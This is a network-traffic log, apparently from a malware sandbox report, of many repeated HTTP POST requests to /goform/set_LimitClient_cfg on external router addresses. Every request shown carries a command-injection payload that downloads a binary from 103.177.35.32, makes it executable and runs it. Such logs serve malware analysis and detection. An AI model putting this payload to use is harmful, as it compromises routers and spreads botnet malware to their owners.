                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        468192.168.2.2355842115.150.180.2438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.302661896 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        469192.168.2.2343514139.90.253.2538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.302738905 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        470192.168.2.2343936105.55.23.218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.302757025 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        471192.168.2.235521879.21.93.628080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.302844048 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        472192.168.2.2341362106.110.156.608080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.302845955 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        473192.168.2.233302838.79.42.1488080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.302853107 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        474192.168.2.2354706202.18.251.1458080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.302861929 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        475192.168.2.235036046.39.59.758080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.302968979 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        476192.168.2.2336790113.200.222.2438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.302980900 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        477192.168.2.2357428212.103.8.688080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.302985907 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        478192.168.2.2341522207.248.252.698080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.303015947 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        479192.168.2.2339684168.13.51.568080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.303040981 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        480192.168.2.233392818.2.66.998080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.303065062 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        481192.168.2.2335772205.229.173.428080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.303095102 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        482192.168.2.233359453.134.212.838080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.303116083 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        483192.168.2.233705071.209.176.1458080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.303144932 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        484192.168.2.2357132114.181.86.1758080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.303232908 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        485192.168.2.235866668.22.235.698080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.303240061 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        486192.168.2.2350774203.42.238.2548080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.303546906 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        487192.168.2.234952059.240.229.1678080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.303589106 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        488192.168.2.23426341.42.151.2188080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.303611040 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        489192.168.2.2348110101.184.75.1138080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.303757906 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        490192.168.2.2335300126.248.131.1718080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.303786039 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
